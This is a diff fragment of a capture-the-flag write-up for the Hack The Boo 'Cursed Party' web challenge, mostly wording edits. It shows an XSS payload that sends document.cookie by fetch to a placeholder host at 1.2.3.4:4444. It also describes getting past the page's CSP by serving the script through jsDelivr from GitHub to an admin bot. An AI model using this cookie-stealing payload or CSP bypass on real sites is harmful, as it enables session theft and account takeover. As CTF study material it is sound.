pgaulon/pgaulon.github.io/2022-11-15-htb-hack-the-boo-ctf/web_cursed_party.md

 });
 ```

-It uses `https://cdn.jsdelivr.net` as base URL for scripts: we can upload an XSS payload to Github, use JS Delivr to fetch that script and serve it as part of its CDN.
+It uses `https://cdn.jsdelivr.net` as the base URL for scripts: we can upload an XSS payload to Github, use JS Delivr to fetch that script and serve it as part of its CDN.

-The XSS payload we will use should not use `eval`, as the CSP doesn't allow `unsafe-eval`.
+The XSS payload we will use should not contain `eval`, as the CSP doesn't allow `unsafe-eval`.
 We can use `fetch` to send the cookie data

 ```html
 <script>fetch('http://1.2.3.4:4444?aaa='+document.cookie, {method: 'GET',mode: 'no-cors'});</script>
 ```

-Once this is hosted on Github, we use the corresponding JS Delivr as part of the invitation sent over the form, to be displayed to the admin bot.
+Once this is hosted on Github, we send the corresponding JSDelivr as part of the invitation form, to be displayed by the admin bot.

 ```python
 import requests